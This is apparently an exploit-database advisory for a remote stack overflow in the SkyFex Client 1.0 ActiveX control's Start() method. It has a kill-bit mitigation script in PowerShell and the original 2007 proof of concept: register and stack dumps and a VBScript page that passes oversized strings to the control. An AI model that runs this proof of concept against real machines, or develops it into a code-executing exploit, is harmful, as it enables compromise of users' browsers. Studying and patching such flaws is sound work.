Vendor: SkyFex Client
By: shinnai
CVSS: 7.5 (HIGH)
Type: Remote Stack Overflow
CWE: Not mentioned
Product Name: SkyFex Client
Affected Version From: 1.0.2.77
Affected Version To: 1.0.2.77
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

SkyFex Client 1.0 “Start()” Method Remote Stack Overflow

SkyFex Client 1.0 is vulnerable to a remote stack overflow in the "Start()" method. An attacker who passes specially crafted input to the method can overflow the stack and potentially execute arbitrary code. The vulnerability can be exploited remotely without authentication. It affects version 1.0.2.77 of the SkyFexClient.ocx file. The exploit was tested on Windows XP Professional SP2 with Internet Explorer 7.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to discontinue the use of the vulnerable software or implement additional security measures to protect against potential attacks.
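
Since no patch exists and the advisory's technical details list the control as "KillBitSet: False", one additional measure is to set the Internet Explorer kill bit for its CLSID. The script below is an added example, not part of the advisory or the vendor's guidance; it assumes PowerShell 3.0 or later, and the `-Apply` switch and function name are hypothetical names chosen here.

```powershell
# Added example, not part of the advisory. Reports (and with -Apply sets) the
# Internet Explorer kill bit for the control instantiated by the PoC.
param([switch]$Apply)  # assumed switch name; without it the script only reports

$Clsid   = '{F84E0B64-1E86-4640-8094-5B38CEB28C1E}'  # from the PoC <object> tag
$KillBit = 0x00000400  # "Compatibility Flags" bit that stops IE loading a control
$Name    = 'Compatibility Flags'

# Native registry view, plus the 32-bit view that 32-bit IE reads on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBitState {
    param([string]$Root)
    $key   = "$Root\$Clsid"
    $flags = 0
    if (Test-Path -Path $key) {
        $prop = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
        if ($prop) { $flags = [int]$prop.$Name }
    }
    [pscustomobject]@{
        Key        = $key
        Flags      = $flags
        KillBitSet = [bool]($flags -band $KillBit)
    }
}

foreach ($root in $Roots) {
    if (-not (Test-Path -Path $root)) { continue }  # view not present on this OS
    $state = Get-KillBitState -Root $root
    if ($Apply -and -not $state.KillBitSet) {       # writing HKLM needs elevation
        if (-not (Test-Path -Path $state.Key)) {
            New-Item -Path $state.Key -Force | Out-Null
        }
        # OR the bit in so any compatibility flags already present are kept.
        $value = $state.Flags -bor $KillBit
        New-ItemProperty -Path $state.Key -Name $Name -PropertyType DWord `
            -Value $value -Force | Out-Null
        $state = Get-KillBitState -Root $root
    }
    $state | Select-Object Key, @{ n = 'Flags'; e = { '0x{0:X8}' -f $_.Flags } }, KillBitSet
}
```

The kill bit only stops Internet Explorer and other hosts that honor it from instantiating the control; the vulnerable SkyFexClient.ocx remains on disk until the software is removed.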

Exploit-DB raw data:

<pre>
<code><span style="font: 8pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
 <b>SkyFex Client 1.0 "Start()" Method Remote Stack Overflow</b>
 url: https://skyfex.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 <b>Technical details:
 File: SkyFexClient.ocx
 Ver.: 1.0.2.77
 Codebase: https://skyfex.com//download/SkyFexClient.cab#Version=1,0,2,77
 Marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 KillBitSet: False</b>

 <b>Registers dump:</b>
 EAX 007B5A8C
 ECX 0164224C
 EDX 033E0024 UNICODE "DDDD..."
 EBX 00000000
 ESP 01735244 ASCII "EEE"
 EBP 0173F414 ASCII "$A"
 ESI 008A8A8C
 EDI 033E0024 UNICODE "DDDD..."
 EIP 02A995E5 SkyFexCl.02A995E5

 <b>Stack dump:</b>
 01735244   00454545  IEXPLORE.00454545
 01735248   02A60045  RETURN to SkyFexCl.02A60045 from SkyFexCl.02A995C0
 0173524C   43434343  urlmon.43434343
 01735250   43434343  urlmon.43434343
 01735254   43434343  urlmon.43434343
 01735258   43434343  urlmon.43434343
 0173525C   43434343  urlmon.43434343
 ...

 'Sub start (
 '     ByVal id_client  As String , 
 '     ByVal ip_server  As String , 
 ' 	ByVal text_ser  As String , 
 ' 	ByVal url_page  As String , 
 ' 	ByVal bDebug  As Integer 
 ' )
 
 <b><font color='red'>This was written for educational purposes. Use it at your own risk.
 Author will not be responsible for any damage.</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:F84E0B64-1E86-4640-8094-5B38CEB28C1E' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   id_client = String(16676, "A")
   ip_server = String(2000, "B")
   text_ser = String(2000, "C")
   url_page = String(4539717, "D")
   bDebug = 484
       
   test.start id_client, ip_server, text_ser, url_page, bDebug
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-12-28]